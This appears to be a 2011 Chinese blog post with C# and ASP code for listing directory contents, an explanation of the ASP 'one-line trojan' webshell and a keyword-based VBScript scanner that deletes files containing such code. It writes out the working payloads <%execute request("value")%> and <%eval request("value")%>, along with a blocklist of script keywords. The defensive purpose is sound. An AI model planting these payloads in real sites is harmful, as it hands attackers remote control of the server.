文件列表,一句话木马

发布:2011-10-28 08:28   点击871次   评论:0

文件列表

/// <summary>
/// Walks <paramref name="directory"/> depth-first: every subdirectory is visited
/// recursively before the files of the directory itself are enumerated.
/// </summary>
/// <param name="directory">Root of the tree to walk.</param>
/// <remarks>
/// Nothing is returned or stored. For each file, the containing path and the file
/// name are read into locals only, marking where a caller would act on them.
/// The walk has no exception handling, so a directory that cannot be read aborts
/// the whole traversal, and nothing here checks for reparse points before descending.
/// </remarks>
private void forFileLength(DirectoryInfo directory)
{
    // Subdirectories first, so the deepest levels are finished before this level's files.
    foreach (DirectoryInfo child in directory.GetDirectories())
    {
        forFileLength(child);
    }

    FileInfo[] entries = directory.GetFiles();
    for (int index = 0; index < entries.Length; index++)
    {
        FileInfo entry = entries[index];
        string containingPath = entry.DirectoryName.ToString();  // directory that holds the file
        string fileName = entry.Name;                            // file name without the path
    }
}

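' Writes a nested HTML list describing `path`: one item for the folder itself
' (name, file count, subfolder count), then every subfolder recursively, then
' the name of each file in the folder.
' NOTE(review): the list tags of the published listing were lost when the page
' was rendered (they show up as bullets and empty strings); the <li>/<ul> tags
' below are a reconstruction, confirm against the page that uses this sub.
' Folder and file names come from the file system and may contain markup, so
' they go through Server.HTMLEncode before being written to the response.
' `path` is used exactly as given: the caller decides which tree is exposed,
' so it should not come from request input without being pinned to a fixed root.
sub ListFolderContents(path)
    dim fs, folder, item
    set fs = CreateObject("Scripting.FileSystemObject")
    set folder = fs.GetFolder(path)

    ' Header item for this folder; the nested list it opens is closed at the end.
    Response.Write("<li>" & Server.HTMLEncode(folder.Name) & " - " & folder.Files.Count & " files, " & folder.SubFolders.Count & " directories." & vbCrLf & "<ul>" & vbCrLf)

    ' Subfolders are listed before the files of the current folder.
    for each item in folder.SubFolders
        Call ListFolderContents(item.Path)
    next

    for each item in folder.Files
        Response.Write("<li>" & Server.HTMLEncode(item.Name) & "</li>" & vbCrLf)
    next

    Response.Write("</ul>" & vbCrLf)
    Response.Write("</li>" & vbCrLf)

    set folder = nothing
    set fs = nothing
end sub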





    一句话木马

    黑客在注册信息的电子邮箱或者个人主页等中插入类似如下代码:

    <%execute request("value")%>
    <%eval request("value")%>(现在比较多见的,而且字符少,对表单字数有限制的地方特别的实用)
    当知道了数据库的URL,就可以利用本地一张网页进行连接得到Webshell。(不知道数据库也可以,只要知道<%eval request("value")%>这个文件被插入到哪一个ASP文件里面就可以了。)
    这就被称为一句话木马,它是基于B/S结构的。

    <%
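    Function alertAndRemoveFile(PathAndFileName)
        ' Scans the text file at PathAndFileName line by line with includeBadWord
        ' and deletes the file as soon as one line matches.
        '   PathAndFileName - a physical path (contains ":") or a virtual path,
        '                     which is resolved with Server.MapPath. VBScript
        '                     passes it ByRef, so the caller's variable receives
        '                     the mapped path.
        '   Returns the string "1" when a match was found (the file is then
        '   deleted), False otherwise.
        ' NOTE(review): False is also returned when the file cannot be opened, so
        ' the caller cannot tell "clean" from "not scanned"; a caller that goes on
        ' to use the file should treat that case as untrusted.
        ' The keyword match is a coarse heuristic and should not be the only
        ' control on user-supplied content; keeping such files where the server
        ' does not interpret them as script is the stronger measure.
        On Error Resume Next
        Dim MyFileObject, MyTextFile, NeedDel, StrCheckFile
        alertAndRemoveFile = False
        NeedDel = ""

        ' Fix: the published code tested the literal string "PathAndFileName",
        ' which never contains ":", so MapPath was attempted on every input,
        ' physical paths included.
        If InStr(PathAndFileName, ":") < 1 Then PathAndFileName = Server.MapPath(PathAndFileName)
        Err.Clear

        Set MyFileObject = Server.CreateObject("Scripting.FileSystemObject")
        Set MyTextFile = MyFileObject.OpenTextFile(PathAndFileName)
        If Err.Number <> 0 Then
            ' The open failed; previously every later stream call then failed
            ' silently as well. Stop here instead of looping on a missing stream.
            Err.Clear
            Set MyTextFile = Nothing
            Set MyFileObject = Nothing
            Exit Function
        End If

        Do Until MyTextFile.AtEndOfStream
            StrCheckFile = MyTextFile.ReadLine
            If Err.Number <> 0 Then Exit Do   ' read error: stop rather than spin
            If includeBadWord(StrCheckFile) Then   ' keyword check on this line
                alertAndRemoveFile = "1"
                NeedDel = "1"
                Exit Do
            End If
        Loop
        MyTextFile.Close

        ' The stream is closed before deletion so the file is no longer held open.
        If NeedDel = "1" Then MyFileObject.DeleteFile PathAndFileName
        Err.Clear
        Set MyTextFile = Nothing
        Set MyFileObject = Nothing

    End Function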


    ''检查文本中是否含有有害代码

    Function includeBadWord(FileStr)
        ' Returns True when FileStr contains any keyword from the blocklist below,
        ' compared case-insensitively (the text is lowercased, the keywords are
        ' already lowercase); returns False otherwise.
        ' The match is a plain substring test, so ordinary text containing words
        ' such as "request" is reported as well.
        Dim keywordList, keyword, lowered
        includeBadWord = False

        ' Blocklist of substrings treated as malicious, separated by "|".
        keywordList = "server.|.createobject|execute|.encode|eval|request|language=|activexobject"
        lowered = LCase(FileStr)

        For Each keyword In Split(keywordList, "|")
            ' Blank entries are skipped: InStr reports a hit for an empty needle.
            If Trim(keyword) <> "" Then
                If InStr(lowered, keyword) > 0 Then
                    includeBadWord = True
                    Exit For
                End If
            End If
        Next
    End Function
    %>

    <%
    ' Page-level check: scan the file named by FileName1 (set elsewhere on the
    ' page, not shown here) and stop the response when the scan reports a hit.
    Dim NeedDel
    NeedDel = alertAndRemoveFile(FileName1)   ' "1" means a keyword matched and the file was removed

    ' The comparison is against the string "1" because that is what the scan returns on a hit.
    If NeedDel="1" Then
        ' NOTE(review): the message literal is a single space here; its original
        ' content was presumably lost when the page was rendered.
        Response.Write " "
        Response.End
    End If
    %>
